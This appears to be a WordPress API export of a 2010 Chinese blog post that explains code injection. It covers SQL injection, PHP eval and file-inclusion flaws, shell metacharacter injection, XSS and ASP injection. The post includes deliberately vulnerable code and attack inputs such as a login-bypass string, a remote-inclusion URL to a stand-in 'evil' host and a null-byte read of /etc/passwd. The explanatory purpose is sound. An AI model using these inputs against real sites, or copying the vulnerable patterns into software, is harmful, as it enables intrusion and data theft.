{"id":319,"date":"2010-04-06T00:41:38","date_gmt":"2010-04-06T00:41:38","guid":{"rendered":""},"modified":"2010-04-06T00:41:38","modified_gmt":"2010-04-06T00:41:38","slug":"319","status":"publish","type":"post","link":"https:\/\/www.poloo.org\/?p=319","title":{"rendered":"\u5404\u79cd\u7c7b\u578b\u4ee3\u7801\u6ce8\u5165\u4e3e\u4f8b"},"content":{"rendered":"<p><strong>SQL\u6ce8\u5165<\/strong><br \/>\u4e3b\u6761\u76ee\uff1aSQL Injection<br \/>SQL\u6ce8\u5165\u662f\u79cd\u4e58SQL\u8bed\u6cd5\u4e4b\u5229\u6ce8\u5165\u53ef\u8bfb\u53d6\u6216\u8005\u4fee\u6539\u6570\u636e\u5e93\u3001\u6216\u8005\u626d\u66f2\u539f\u59cb\u67e5\u8be2\u610f\u4e49\u7684\u547d\u4ee4\u3002<\/p>\n<p>\u4ee5\u4e00\u4e2a\u7f51\u9875\u6709\u4e24\u4e2a\u5b57\u6bb5\u8ba9\u7528\u6237\u8f93\u5165\u7528\u6237\u540d\u4e0e\u5bc6\u7801\u4e3a\u4f8b\uff0c\u5728\u8be5\u7f51\u9875\u5e55\u540e\u5de5\u4f5c\u7684\u4ee3\u7801\u4f1a\u4ea7\u751fSQL\u67e5\u8be2\u4ee5\u68c0\u67e5\u5bc6\u7801\u662f\u5426\u4e0e\u7528\u6237\u540d\u79f0\u5bc6\u7801\u5217\u8868\u76f8\u7b26\uff1a<\/p>\n<p>Select UserList.Username<br \/>FROM UserList<br \/>Where UserList.Username = &#8216;Username&#8217;<br \/>AND UserList.Password = &#8216;Password&#8217;<br \/>\u5982\u679c\u8fd9\u67e5\u8be2\u6709\u56de\u5e94\u884c\u6570\uff0c\u4fbf\u5141\u8bb8\u8be5\u8bbf\u95ee\u3002\u7136\u800c\uff0c\u5982\u679c\u6076\u610f\u7528\u6237\u952e\u5165\u5408\u6cd5\u7528\u6237\u540d\uff0c\u5e76\u4e14\u5728\u5bc6\u7801\u680f\u6ce8\u5165\u67d0\u4e9b\u5408\u6cd5\u4ee3\u7801 (&#8220;password&#8217; or &#8216;1&#8217;=&#8217;1&#8221;)\uff0c\u67e5\u8be2\u7ed3\u679c\u4fbf\u5982\u4e0b\u6240\u793a\uff1a<\/p>\n<p>Select UserList.Username<br \/>FROM UserList<br \/>Where UserList.Username = &#8216;Username&#8217;<br \/>AND UserList.Password = &#8216;password&#8217; or &#8216;1&#8217;=&#8217;1&#8242;<br \/>\u5728\u4e0a\u9762\u793a\u4f8b\u91cc\uff0c&#8221;Password&#8221;\u88ab\u5047\u5b9a\u4e3a\u7a7a\u767d\u6216\u8005\u67d0\u4e2a\u65e0\u5bb3\u7684\u5b57\u7b26\u4e32\u3002&#8221;&#8216;1&#8217;=&#8217;1&#8242;&#8221;\u903b\u8f91\u5f0f\u5c06\u6c38\u8fdc\u4e3a\u771f\uff0c\u5e76\u4e14\u627e\u5230\u591a\u5c11\u884c\u5c31\u56de\u5e94\u591a\u5c11\u884c\uff0c\u56e0\u6b64\u8bbf\u95ee\u5c31\u88ab\u5141\u8bb8\u4e86\u3002<\/p>\n<p>\u8be5\u6280\u672f\u53ef\u88ab\u7cbe\u7ec3\u6210\u5141\u8bb8\u8fd0\u884c\u591a\u91cd\u9648\u8ff0\uff0c\u751a\u6216\u52a0\u8f7d\u5916\u90e8\u7a0b\u5e8f\u3002<\/p>\n<p><strong> PHP\u6ce8\u5165<\/strong><br \/>&#8220;PHP\u6ce8\u5165&#8221;\u3001&#8221;ASP\u6ce8\u5165&#8221;\u3001\u4ee5\u53ca\u5176\u4ed6\u7c7b\u4f3c\u6280\u672f\u672f\u8bed\u662f\u521b\u9020\u6765\u6cdb\u6307\u5176\u4ed6\u79cd\u79cd\u5141\u8bb8\u653b\u51fb\u8005\u76f4\u63a5\u5bf9\u670d\u52a1\u5668\u811a\u672c\u5f15\u64ce\u63d0\u4f9b\u4ee3\u7801\u7684\u4ee3\u7801\u6ce8\u5165\u653b\u51fb\u3002\u5728&#8221;PHP\u6ce8\u5165&#8221;\u5b9e\u4f8b\u91cc\uff0c\u670d\u52a1\u7aef\u811a\u672c\u5f15\u64ce\u662fPHP\u3002<\/p>\n<p>\u5b9e\u9645\u4e0a\uff0cPHP\u6ce8\u5165\u662f\u201c\u52a8\u6001\u8d4b\u503c\u5b89\u5168\u9690\u60a3\u201d\u3001\u201c\u5305\u542b\u6587\u4ef6\u6ce8\u5165\u201d\u3001\u6216\u8005\u7c7b\u4f3c\u4ee3\u7801\u6ce8\u5165\u7684\u5b89\u5168\u9690\u60a3\u3002<\/p>\n<p> \u52a8\u6001\u8d4b\u503c\u5b89\u5168\u9690\u60a3<br \/>mitre.org\u7684\u53f2\u8482\u82ac\u514b\u5229\u65af\u7b2c (Steven M. Christey)\u63d0\u8bae\u4ee5\u8fd9\u4e2a\u540d\u5b57\u4f5c\u4e3a\u8fd9\u7c7b\u578b\u7684\u4ee3\u7801\u6ce8\u5165\u5b89\u5168\u9690\u60a3\u3002<\/p>\n<p> \u52a8\u6001\u8d4b\u503c\u5b89\u5168\u9690\u60a3 &#8211; Eval\u6ce8\u5165<br \/>eval\u6ce8\u5165\u5b89\u5168\u9690\u60a3\u53d1\u751f\u5728\u653b\u51fb\u8005\u53ef\u63a7\u5236\u6240\u6709\u6216\u8005\u90e8\u4efd\u4f5c\u4e3a\u201c\u5582\u201d\u7ed9eval()\u51fd\u6570\u8c03\u7528\u7684\u8f93\u5165\u5b57\u7b26\u4e32\u3002[2]<\/p>\n<p>$myvar = &#8216;somevalue&#8217;; <br \/>$x = $_GET[&#8216;arg&#8217;]; <br \/>eval(&#8216;$myvar = &#8216; . $x . &#8216;;&#8217;);<br \/>&#8220;eval&#8221;\u7684\u53c2\u6570\u5c06\u4f1a\u89c6\u540cPHP\u5904\u7406\uff0c\u6240\u4ee5\u989d\u5916\u7684\u547d\u4ee4\u53ef\u88ab\u6dfb\u52a0\u3002\u4f8b\u5982\uff1a\u5982\u679c&#8221;arg&#8221;\u5982\u679c\u88ab\u8bbe\u6210&#8221;10; system(&#8216;\/bin\/echo uh-oh&#8217;)&#8221;\uff0c\u540e\u9762\u7684&#8221;system(&#8216;\/bin\/echo uh-oh&#8217;)&#8221;\u4ee3\u7801\u5c06\u88ab\u8fd0\u884c\uff0c\u8fd9\u7b49\u540c\u5728\u670d\u52a1\u5668\u4e0a\u8fd0\u884c\u5f00\u53d1\u8005\u610f\u6599\u5916\u7684\u7a0b\u5e8f\u3002\u5728\u8fd9\u793a\u4f8b\u91cc\u5934\u662f&#8221;\/bin\/echo&#8221;\u3002<\/p>\n<p> \u52a8\u6001\u8d4b\u503c\u5b89\u5168\u9690\u60a3 &#8211; \u52a8\u6001\u53d8\u91cf\u8d4b\u503c<br \/>\u5982\u5728&#8221;Dynamic Evaluation Vulnerabilities in PHP applications&#8221;\u4e00\u6587\u6240\u5b9a\u4e49\u7684\uff1a PHP\u652f\u6301 &#8220;\u53d8\u91cf\u7684\u53d8\u91cf&#8221;\uff0c\u610f\u6307\u53d8\u91cf\u6216\u8005\u8868\u8fbe\u5f0f\u53ef\u4ee5\u5bf9\u5176\u4ed6\u53d8\u91cf\u540d\u8d4b\u503c\u3002\u8fd9\u79cd\u7279\u6027\u53ef\u7528\u6765\u4e8e\u7a0b\u5e8f\u8fd0\u884c\u65f6\u671f\u52a8\u6001\u6539\u53d8\u54ea\u4e2a\u53d8\u91cf\u88ab\u8bbf\u95ee\u6216\u7ed9\u503c\u3002\u8fd9\u79cd\u7279\u6027\u662f\u628a\u53cc\u5203\u5251\uff1a\u5f3a\u5927\u3001\u4fbf\u5229\u3001\u540c\u65f6\u4e5f\u5f88\u5371\u9669\u3002<\/p>\n<p>\u8bb8\u591a\u7a0b\u5e8f\u6709\u4e0b\u9762\u7c7b\u4f3c\u4ee3\u7801\uff1a<br \/><code><br \/>$safevar = \"0\"; <br \/>$param1 = \"\"; <br \/>$param2 = \"\"; <br \/>$param3 = \"\"; <br \/># my own \"register globals\" for param[1,2,3] <br \/>foreach ($_GET as $key =&gt; $value) { <br \/>&nbsp;&nbsp;$$key = $value; <br \/>}<br \/><\/code><br \/>\u5982\u679c\u653b\u51fb\u8005\u5728\u67e5\u8be2\u5b57\u7b26\u4e32\u4e2d\u7ed9\u5b9a&#8221;safevar=bad&#8221;\uff0c\u90a3$safevar\u5c06\u4f1a\u88ab\u8bbe\u4e3a\u503c &#8220;bad&#8221;\u3002<\/p>\n<p> \u52a8\u6001\u8d4b\u503c\u5b89\u5168\u9690\u60a3 &#8211; \u52a8\u6001\u51fd\u6570\u8d4b\u503c<br \/>\u4e0b\u9762PHP\u793a\u4f8b\u5c06\u6309\u7167\u8bf7\u6c42\u7684\u65b9\u5f0f\u8fd0\u884c\u51fd\u6570\u3002<\/p>\n<p>$myfunc = $_GET[&#8216;myfunc&#8217;]; <br \/>$myfunc();<br \/>\u4ee5\u53ca\uff1a<\/p>\n<p>$myfunc = $_GET[&#8216;myfunc&#8217;]; <br \/>${&#8220;myfunc&#8221;}();<br \/> \u5305\u542b\u6587\u4ef6\u6ce8\u5165<br \/>\u8003\u8651\u4e0b\u9762\u7684PHP\u7a0b\u5e8f(\u8fd9\u91cc\u5305\u542b\u4e86\u4e2a\u6587\u4ef6\u53ef\u56e0\u5e94\u9700\u6c42\u6539\u53d8)\uff1a<br \/><code><br \/>&lt;?php<br \/>&nbsp;&nbsp; $color = 'blue';<br \/>&nbsp;&nbsp; if (__isset( $_GET['COLOR'] ) )<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$color = $_GET['COLOR'];<br \/>&nbsp;&nbsp; require( $color . '.php' );<br \/>?&gt;<br \/>&lt;form method=\"get\"&gt;<br \/>&nbsp;&nbsp; &lt;select name=\"COLOR\"&gt;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;option value=\"red\"&gt;red&lt;\/option&gt;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;option value=\"blue\"&gt;blue&lt;\/option&gt;<br \/>&nbsp;&nbsp; &lt;\/select&gt;<br \/>&nbsp;&nbsp; &lt;input type=\"submit\"&gt;<br \/>&lt;\/form&gt;<br \/><\/code><br \/>\u5f00\u53d1\u8005\u8ba4\u4e3a\u8fd9\u6837\u5927\u6982\u53ef\u4ee5\u4fdd\u8bc1\u53ea\u6709 blue.php \u548c red.php \u53ef\u88ab\u52a0\u8f7d\u3002\u4e0d\u8fc7\u968f\u7740\u4efb\u4f55\u4eba\u53ef\u5728COLOR\u8f7b\u6613\u7684\u63d2\u5165\u968f\u610f\u503c\uff0c\u9020\u6210\u4ee5\u4e0b\u6587\u4ef6\u6ce8\u5165\u7684\u53ef\u80fd\u6027\uff1a<\/p>\n<p>\/vulnerable.php?COLOR=http:\/\/evil\/exploit? &#8211; \u6ce8\u5165\u8fdc\u7a0b\u673a\u5668\u4e0a\u6709\u6f0f\u6d1e\u7684\u6587\u4ef6\u3002 <br \/>\/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit &#8211; \u4ece\u4e00\u4e2a\u5df2\u7ecf\u4e0a\u8f7d\u3001\u53eb\u505aexploit.php\u6587\u4ef6\u8fd0\u884c\u5176\u4ee3\u7801\u3002 <br \/>\/vulnerable.php?COLOR=http:\/\/www.cnblogs.com\/<a href=\"http:\/\/www.cnblogs.com\/http:\/\/www.cnblogs.com\/http:\/\/www.cnblogs.com\/etc\/passwd%00\" target=\"_blank\" rel=\"external\">http:\/\/www.cnblogs.com\/http:\/\/www.cnblogs.com\/http:\/\/www.cnblogs.com\/etc\/passwd%00<\/a> &#8211; \u8ba9\u653b\u51fb\u8005\u53d6\u5f97\u8be5UNIX\u7cfb\u7edf\u76ee\u5f55\u68c0\u7d22\u4e0b\u5bc6\u7801\u6587\u4ef6\u7684\u5185\u5bb9\u3002 <br \/>\/vulnerable.php?COLOR=C:\\notes.txt%00 &#8211; \u4e00\u4e2a\u4f7f\u7528\u7a7a\u5143\u5b57\u7b26\u4ee5\u89e3\u9664.php\u6269\u5c55\u540d\u9650\u5236\uff0c\u5141\u8bb8\u8bbf\u95ee\u5176\u4ed6\u975e .php \u7ed3\u5c3e\u6587\u4ef6\u3002 (PHP\u9ed8\u8ba4\u503c&#8221;magic_quotes_gpc = On&#8221;\u53ef\u4ee5\u7ec8\u6b62\u8fd9\u79cd\u653b\u51fb) <br \/><strong> Shell\u6ce8\u5165<\/strong><br \/>Shell\u6ce8\u5165\u53c8\u79f0\u547d\u4ee4\u884c\u754c\u9762\u6ce8\u5165\uff0c\u5b83\u547d\u540d\u6e90\u4e8eUnix Shell\uff0c\u4e0d\u8fc7\u53ef\u5957\u7528\u5230\u5927\u90e8\u5206\u5141\u8bb8\u8f6f\u4ef6\u7a0b\u5e8f\u5316\u5730\u8fd0\u884c\u547d\u4ee4\u884c\u63a5\u53e3\u7684\u7cfb\u7edf\u4e0a\u3002\u5e38\u89c1\u7684Shell\u6ce8\u5165\u8d44\u6e90\u6709system()\u3001StartProcess()\u3001java.lang.Runtime.exec()\u3001System.Diagnostics.Process.Start()\u4ee5\u53ca\u7c7b\u4f3c\u7684\u5e94\u7528\u7a0b\u5e8f\u63a5\u53e3\u3002<\/p>\n<p>\u8003\u8651\u4e0b\u9762\u7684\u7b80\u77edPHP\u7a0b\u5e8f\u3002\u5b83\u8fd0\u884c\u4e00\u6bb5\u53eb\u505afunnytext\u7684\u5916\u90e8\u7a0b\u5e8f\uff0c\u4ee5\u7f6e\u6362\u7528\u6237\u9001\u51fa\u7684\u8bb8\u591a\u5176\u4ed6\u5355\u5b57\uff1a<\/p>\n<p>&lt;?php<br \/>passthru ( &#8221; \/home\/user\/phpguru\/funnytext &#8221; <br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; . $_GET[&#8216;USER_INPUT&#8217;] );<br \/>?&gt;<br \/>\u8be5\u7a0b\u5e8f\u53ef\u4ee5\u4ee5\u591a\u79cd\u65b9\u5f0f\u88ab\u6ce8\u5165\uff1a<\/p>\n<p>`\u547d\u4ee4` \u5c06\u4f1a\u8fd0\u884c \u547d\u4ee4. <br \/>$(\u547d\u4ee4) \u5c06\u4f1a\u8fd0\u884c \u547d\u4ee4. <br \/>; \u547d\u4ee4 \u5c06\u4f1a\u8fd0\u884c \u547d\u4ee4\uff0c\u5e76\u8f93\u51fa\u547d\u4ee4\u7684\u7ed3\u679c\u3002 <br \/>| \u547d\u4ee4 \u5c06\u4f1a\u8fd0\u884c \u547d\u4ee4\uff0c\u5e76\u8f93\u51fa\u547d\u4ee4\u7684\u7ed3\u679c\u3002 <br \/>&#038;&#038; \u547d\u4ee4 \u5c06\u4f1a\u8fd0\u884c \u547d\u4ee4\uff0c\u5e76\u8f93\u51fa\u547d\u4ee4\u7684\u7ed3\u679c\u3002 <br \/>|| \u547d\u4ee4 \u5c06\u4f1a\u8fd0\u884c \u547d\u4ee4\uff0c\u5e76\u8f93\u51fa\u547d\u4ee4\u7684\u7ed3\u679c\u3002 <br \/>&gt; \/home\/user\/phpguru\/.bashrc \u5c06\u4f1a\u6539\u5199\u6587\u4ef6 .bashrc. <br \/>&lt; \/home\/user\/phpguru\/.bashrc \u5c06\u4f1a\u5c06\u6587\u4ef6 .bashrc \u9001\u51fa\uff0c\u5f53\u6210\u662f funnytext \u7684\u8f93\u5165\u3002 <br \/>\u6ce8\uff1a\u547d\u4ee4\u6307\u7684\u662f\u547d\u4ee4\u884c\u63a5\u53e3\u4e0b\u53ef\u4f9b\u8f93\u5165\u8fd0\u884c\u7684\u547d\u4ee4\uff0c\u4f8b\u5982\u89c6\u7a97\u5e73\u53f0\u7684 dir\u3001UNIX \u5e73\u53f0\u7684 ls \u7b49\u7b49\u3002<\/p>\n<p>PHP\u63d0\u4f9bescapeshellarg()\u548cescapeshellcmd()\u4ee5\u5728\u8c03\u7528\u65b9\u6cd5\u4ee5\u524d\u8fdb\u884c\u7f16\u7801\u3002\u7136\u800c\uff0c\u5b9e\u9645\u4e0a\u5e76\u4e0d\u5efa\u8bae\u76f8\u4fe1\u8fd9\u4e9b\u65b9\u6cd5\u662f\u5b89\u5168\u7684 &#8211; \u540c\u6837\u5fc5\u987b\u5bf9\u8f93\u5165\u786e\u8ba4 \/ \u6d88\u6bd2\u3002<\/p>\n<p><strong> HTML\u6ce8\u5165\/\u811a\u672c\u6ce8\u5165 (\u8de8\u7f51\u7ad9\u811a\u672c)<\/strong><br \/>\u4e3b\u6761\u76ee\uff1a\u8de8\u7f51\u7ad9\u811a\u672c<br \/>HTML\u6ce8\u5165\/\u811a\u672c\u6ce8\u5165\u662f\u4e2a\u7092\u5f97\u76f8\u5f53\u70ed\u7684\u8bdd\u9898\uff0c\u4e00\u822c\u4e13\u4e1a\u672f\u8bed\u4e3a\u8de8\u7f51\u7ad9\u811a\u672c\uff08Cross-site scripting\uff0c\u901a\u5e38\u7b80\u79f0\u4e3aXSS\uff09\u3002XSS\u6307\u7684\u662f\u4e00\u79cd\u4f9d\u9760\u7528\u6237\u8f93\u5165\u5230\u7f51\u9875\u811a\u672c\uff0c\u6216\u8005\u67d0\u4e9b\u50cf\u4ee3\u7801\u884c\u88ab\u7f6e\u4e8e\u8f93\u51faHTML\uff0c\u800c\u6ca1\u6709\u68c0\u67e5HTML\u4ee3\u7801\u6216\u811a\u672c\u7684\u6ce8\u5165\u6f0f\u6d1e\u3002<\/p>\n<p>\u8fd9\u79cd\u6ce8\u5165\u6709\u4e24\u4e2a\u57fa\u672c\u578b\u5982\u4e0b\uff1a<\/p>\n<p>\u4e3b\u52a8\u5f0f (\u578b 1) <br \/>\u8fd9\u79cd\u578b\u6001\u7684XSS\u6f0f\u6d1e\u6bd4\u8f83\u4e0d\u5371\u9669\uff0c\u56e0\u4e3a\u7528\u6237\u8f93\u5165\u88ab\u7f6e\u4e8e\u52a8\u6001\u4ea7\u751f\u7684\u7f51\u9875\u3002\u670d\u52a1\u5668\u7aef\u6ca1\u6709\u4efb\u4f55\u6539\u53d8\u3002 <br \/>\u88ab\u52a8\u5f0f (\u578b 2) <br \/>\u8fd9\u79cd\u578b\u6001\u6bd4\u8f83\u5371\u9669\uff0c\u56e0\u4e3a\u8f93\u5165\u662f\u5199\u5728\u9759\u6001\u7f51\u9875\u4e0a\uff0c\u6545\u5a01\u80c1\u662f\u6301\u7eed\u6027\u7684\u3002 <br \/> \u4e8eIE7\u901a\u8fc7\u611f\u67d3\u7684\u52a8\u6001\u94fe\u63a5\u5e93(DLL)\u5b9e\u884cHTML\u6ce8\u5165<br \/>\u6839\u636e\u82f1\u56fd\u6280\u672f\u7f51\u7ad9The Register\u7684[3]\u6587\u732e\u6307\u51fa\uff0cHTML\u6ce8\u5165\u4ea6\u53ef\u53d1\u751f\u5728\u7528\u6237\u672c\u8eab\u88ab\u6709\u95ee\u9898\u7684DLL\u611f\u67d3\u8fc7\u7684\u7cfb\u7edf\u8eab\u4e0a\u3002\u8be5\u6587\u732e\u5f15\u7528\u7f57\u6770\u6c64\u68ee (Roger Thompson) \u7684\u8bf4\u6cd5\uff1a\u53d7\u5bb3\u8005\u7684\u6d4f\u89c8\u5668\uff0c\u5b9e\u9645\u4e0a\uff0c\u8bbf\u95ee\u4e86PayPal\u6216\u5176\u4ed6\u7c7b\u4f3c\u7684\u7f51\u7ad9\uff0c\u751a\u6216\u67d0\u52a8\u6001\u94fe\u63a5\u6587\u4ef6\u5c06\u5b83\u81ea\u5df1\u63d2\u5165IE\uff0c\u5e76\u8bd5\u7740\u5728\u4ea4\u6613\u8fdb\u884c\u4e2d\u8bfb\u53d6\u5e76\u4fee\u6539HTML\u3002\u8be5\u6587\u732e\u63d0\u53ca\u4f7f\u7528\u8fd9\u79cd\u624b\u6bb5\u7684\u9493\u9c7c\u653b\u51fb\u987a\u5229\u89c4\u907fIE7\u4e0e\u8d5b\u95e8\u94c1\u514b\u5c1d\u8bd5\u4fa6\u6d4b\u53ef\u7591\u7f51\u7ad9\u7684\u52aa\u529b\u3002<\/p>\n<p><strong> ASP\u6ce8\u5165<\/strong><br \/>&#8220;ASP\u6ce8\u5165&#8221;\u3001&#8221;PHP\u6ce8\u5165&#8221;\u3001\u4ee5\u53ca\u5176\u4ed6\u7c7b\u4f3c\u6280\u672f\u672f\u8bed\u662f\u521b\u9020\u6765\u6cdb\u6307\u5176\u4ed6\u79cd\u79cd\u5141\u8bb8\u653b\u51fb\u8005\u76f4\u63a5\u5bf9\u670d\u52a1\u5668\u811a\u672c\u5f15\u64ce\u63d0\u4f9b\u4ee3\u7801\u7684\u4ee3\u7801\u6ce8\u5165\u653b\u51fb\u3002\u5728&#8221;ASP\u6ce8\u5165&#8221;\u5b9e\u4f8b\u91cc\uff0c\u670d\u52a1\u7aef\u811a\u672c\u5f15\u64ce\u662f\u5fae\u8f6fActive Server Pages\uff0c\u4e00\u79cd\u5fae\u8f6fIIS\u7684\u5916\u52a0\u7ec4\u4ef6\u3002<\/p>\n<p>\u5728\u5b9e\u9645\u4e0a\u4e0ePHP\u76f8\u4f3c\uff0cASP\u6ce8\u5165\u4e5f\u662f\u201c\u52a8\u6001\u8d4b\u503c\u5b89\u5168\u9690\u60a3\u201d\u3001\u201c\u5305\u542b\u6587\u4ef6\u6ce8\u5165\u201d\u3001\u6216\u8005\u7c7b\u4f3c\u4ee3\u7801\u6ce8\u5165\u7684\u5b89\u5168\u9690\u60a3\u3002<\/p>\n<p>\u793a\u4f8b\uff1a<br \/><code><br \/>&lt;%<br \/>&nbsp;&nbsp;&nbsp;&nbsp;If Not IsEmpty(Request( \"username\" ) ) Then<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Const ForReading = 1, ForWriting = 2, ForAppending = 8<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dim fso, f<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Set fso = CreateObject(\"Scripting.FileSystemObject\")<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Set f = fso.OpenTextFile(Server.MapPath( \"userlog.txt\" ), ForAppending, True)<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;f.Write Request(\"username\") & vbCrLf<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;f.close<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Set f = nothing<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Set fso = Nothing<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;%&gt;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;h1&gt;List of logged users:&lt;\/h1&gt;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;pre&gt;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;%<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Server.Execute( \"userlog.txt\" )<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;%&gt;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;\/pre&gt;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;%<br \/>&nbsp;&nbsp;&nbsp;&nbsp;Else<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;%&gt;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;form&gt;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;input name=\"username\" \/&gt;&lt;input type=\"submit\" name=\"submit\" \/&gt;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;\/form&gt;<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;%<br \/>&nbsp;&nbsp;&nbsp;&nbsp;End If<br \/>%&gt;<br \/><\/code><br \/>\u5728\u8fd9\u4e2a\u793a\u4f8b\u4e2d\uff0c\u7528\u6237\u53ef\u7528\u547d\u4ee4\u800c\u975e\u7528\u6237\u540d\u53d6\u4ee3\u8f93\u5165\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>SQL\u6ce8\u5165\u4e3b\u6761\u76ee\uff1aSQL InjectionSQL\u6ce8\u5165\u662f\u79cd\u4e58SQL\u8bed&#46;&#46;&#46;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15],"tags":[],"class_list":["post-319","post","type-post","status-publish","format-standard","hentry","category-Program"],"_links":{"self":[{"href":"https:\/\/www.poloo.org\/index.php?rest_route=\/wp\/v2\/posts\/319","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.poloo.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.poloo.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.poloo.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.poloo.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=319"}],"version-history":[{"count":0,"href":"https:\/\/www.poloo.org\/index.php?rest_route=\/wp\/v2\/posts\/319\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.poloo.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=319"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.poloo.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=319"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.poloo.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=319"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}